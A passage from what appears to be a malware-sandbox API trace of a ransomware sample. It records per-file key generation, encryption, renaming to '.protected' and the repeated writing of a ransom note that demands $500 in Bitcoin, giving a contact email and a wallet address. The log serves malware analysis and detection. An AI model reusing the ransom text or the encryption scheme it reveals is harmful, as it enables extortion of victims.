preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.646] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0071.647] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.647] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0071.647] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.647] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0071.647] CloseHandle (hObject=0xd8) returned 1 [0071.647] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.647] lstrcmpiW (lpString1="Results", lpString2="Windows") returned -1 [0071.647] lstrcmpiW (lpString1="Results", lpString2="Program Files") returned 1 [0071.647] lstrcmpiW (lpString1="Results", lpString2="Program Files (x86)") returned 1 [0071.647] lstrcmpiW (lpString1="Results", lpString2="$Recycle.bin") returned 1 [0071.647] lstrcmpiW (lpString1="Results", lpString2="System Volume Information") returned -1 [0071.647] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned 67 [0071.647] lstrcmpW (lpString1="Results", lpString2=".") returned 1 [0071.647] lstrcmpW (lpString1="Results", lpString2="..") returned 1 [0071.647] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*") returned 69 [0071.647] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0071.647] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.647] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.647] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.647] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.647] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.647] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\.") returned 69 [0071.647] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.647] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0071.647] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.647] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.647] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.648] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.648] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.648] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\..") returned 70 [0071.648] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.648] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.648] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0071.648] lstrcmpiW (lpString1="Resource", lpString2="Windows") returned -1 [0071.648] lstrcmpiW (lpString1="Resource", lpString2="Program Files") returned 1 [0071.648] lstrcmpiW (lpString1="Resource", lpString2="Program Files (x86)") returned 1 [0071.648] lstrcmpiW (lpString1="Resource", lpString2="$Recycle.bin") returned 1 [0071.648] lstrcmpiW (lpString1="Resource", lpString2="System Volume Information") returned -1 [0071.648] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource") returned 76 [0071.648] lstrcmpW (lpString1="Resource", lpString2=".") returned 1 [0071.648] lstrcmpW (lpString1="Resource", lpString2="..") returned 1 [0071.648] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*") returned 78 [0071.648] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x4a9250 [0071.648] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.648] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.648] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.648] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.648] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.648] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\.") returned 78 [0071.648] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.648] FindNextFileW (in: hFindFile=0x4a9250, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0071.648] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.648] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.648] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.648] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.648] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.648] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\..") returned 79 [0071.648] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.648] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.648] FindNextFileW (in: hFindFile=0x4a9250, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0071.648] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="Windows") returned -1 [0071.648] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="Program Files") returned -1 [0071.648] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="Program Files (x86)") returned -1 [0071.648] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="$Recycle.bin") returned 1 [0071.648] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="System Volume Information") returned -1 [0071.648] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}") returned 115 [0071.649] StrStrIW (lpFirst="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpSrch=".protected") returned 0x0 [0071.649] lstrcmpW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="RESTORE_FILES.txt") returned -1 [0071.649] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0071.649] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4922f8*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x4922f8*, pdwDataLen=0x295e794*=0x30) returned 1 [0071.649] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0071.649] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}") returned 115 [0071.649] StrStrW (lpFirst="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpSrch=".txt") returned 0x0 [0071.649] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}") returned 115 [0071.649] StrStrW (lpFirst="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpSrch=".rar") returned 0x0 [0071.649] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}") returned 115 [0071.649] StrStrW (lpFirst="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpSrch=".zip") returned 0x0 [0071.649] ReadFile (in: hFile=0x150, lpBuffer=0x49ec58, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x49ec58*, lpNumberOfBytesRead=0x295e7b4*=0x1a60, lpOverlapped=0x0) returned 1 [0071.662] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe5a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.662] WriteFile (in: hFile=0x150, lpBuffer=0x49ec58*, nNumberOfBytesToWrite=0x1a60, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x49ec58*, lpNumberOfBytesWritten=0x295e7b4*=0x1a60, lpOverlapped=0x0) returned 1 [0071.662] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.662] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0071.663] WriteFile (in: hFile=0x150, lpBuffer=0x4922f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4922f8*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0071.663] CloseHandle (hObject=0x150) returned 1 [0071.663] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected") returned 125 [0071.663] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}.protected")) returned 1 [0071.664] FindNextFileW (in: hFindFile=0x4a9250, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0071.664] FindClose (in: hFindFile=0x4a9250 | out: hFindFile=0x4a9250) returned 1 [0071.664] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\RESTORE_FILES.txt") returned 94 [0071.664] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0071.664] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.664] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0071.665] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.665] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0071.665] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.665] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0071.665] CloseHandle (hObject=0x14c) returned 1 [0071.666] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0071.666] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0071.666] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\RESTORE_FILES.txt") returned 85 [0071.666] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0071.666] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.666] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0071.667] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.667] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0071.667] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.667] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0071.667] CloseHandle (hObject=0xd8) returned 1 [0071.668] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.668] lstrcmpiW (lpString1="Service", lpString2="Windows") returned -1 [0071.668] lstrcmpiW (lpString1="Service", lpString2="Program Files") returned 1 [0071.668] lstrcmpiW (lpString1="Service", lpString2="Program Files (x86)") returned 1 [0071.668] lstrcmpiW (lpString1="Service", lpString2="$Recycle.bin") returned 1 [0071.668] lstrcmpiW (lpString1="Service", lpString2="System Volume Information") returned -1 [0071.668] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned 67 [0071.668] lstrcmpW (lpString1="Service", lpString2=".") returned 1 [0071.668] lstrcmpW (lpString1="Service", lpString2="..") returned 1 [0071.669] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*") returned 69 [0071.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0071.669] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.669] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.669] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.669] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.669] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.669] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\.") returned 69 [0071.669] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.669] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0071.669] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.669] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.669] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.669] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.669] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.669] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\..") returned 70 [0071.670] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.670] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.670] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0071.670] lstrcmpiW (lpString1="History.Log", lpString2="Windows") returned -1 [0071.670] lstrcmpiW (lpString1="History.Log", lpString2="Program Files") returned -1 [0071.670] lstrcmpiW (lpString1="History.Log", lpString2="Program Files (x86)") returned -1 [0071.670] lstrcmpiW (lpString1="History.Log", lpString2="$Recycle.bin") returned 1 [0071.670] lstrcmpiW (lpString1="History.Log", lpString2="System Volume Information") returned -1 [0071.670] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log") returned 79 [0071.670] StrStrIW (lpFirst="History.Log", lpSrch=".protected") returned 0x0 [0071.670] lstrcmpW (lpString1="History.Log", lpString2="RESTORE_FILES.txt") returned -1 [0071.670] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0071.670] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0071.670] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\history.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0071.671] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log") returned 79 [0071.671] StrStrW (lpFirst="History.Log", lpSrch=".txt") returned 0x0 [0071.671] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log") returned 79 [0071.671] StrStrW (lpFirst="History.Log", lpSrch=".rar") returned 0x0 [0071.671] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log") returned 79 [0071.671] StrStrW (lpFirst="History.Log", lpSrch=".zip") returned 0x0 [0071.671] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: 